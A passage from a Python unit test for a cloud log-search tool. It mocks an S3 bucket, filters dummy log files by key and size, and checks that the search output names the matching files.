415 |         s3_client = boto3.client("s3", region_name="us-east-1")
416 |         
417 |         # Upload several objects:
418 |         # - Two objects that match
419 |         s3_client.put_object(Bucket=bucket_name, Key="log_file1.txt", Body=b"dummy content")
420 |         s3_client.put_object(Bucket=bucket_name, Key="log_file2.txt", Body=b"dummy content")
421 |         # Onne that doesnt match the key_contains filter
422 |         s3_client.put_object(Bucket=bucket_name, Key="not_a_thing.txt", Body=b"dummy content")
423 |         # One that doesnt match the file_size filter
424 |         s3_client.put_object(Bucket=bucket_name, Key="log_empty.txt", Body=b"")
425 | 
426 |         # Call list files
427 |         cg = CloudGrep()
428 |         result = cg.list_files(
429 |             bucket=bucket_name,
430 |             account_name=None,
431 |             container_name=None,
432 |             google_bucket=None,
433 |             prefix="",
434 |             key_contains="log",
435 |             from_date=None,
436 |             end_date=None,
437 |             file_size=1000000  # 1 MB
438 |         )
439 | 
440 |         # Assert only the matching files are returned
441 |         self.assertIn("s3", result)
442 |         expected_keys = {"log_file1.txt", "log_file2.txt"}
443 |         self.assertEqual(set(result["s3"]), expected_keys)
444 | 
445 |         # Now search the contents of the files and assert they hit
446 |         for key in expected_keys:
447 |             with patch("sys.stdout", new=StringIO()) as fake_out:
448 |                 cg.search(
449 |                     bucket=bucket_name,
450 |                     account_name=None,
451 |                     container_name=None,
452 |                     google_bucket=None,
453 |                     query=["dummy content"],
454 |                     file=None,
455 |                     yara_file=None,
456 |                     file_size=1000000,
457 |                     prefix="",
458 |                     key_contains=key,
459 |                     from_date=None,
460 |                     end_date=None,
461 |                     hide_filenames=False,
462 |                     log_type=None,
463 |                     log_format=None,
464 |                     log_properties=[],
465 |                     profile=None,
466 |                     json_output=False,
467 |                     files=result, # Pass the pre-filtered files from list_files
468 |                 )
469 |                 output = fake_out.getvalue().strip()
470 |             self.assertIn("log_file1.txt", output)


--------------------------------------------------------------------------------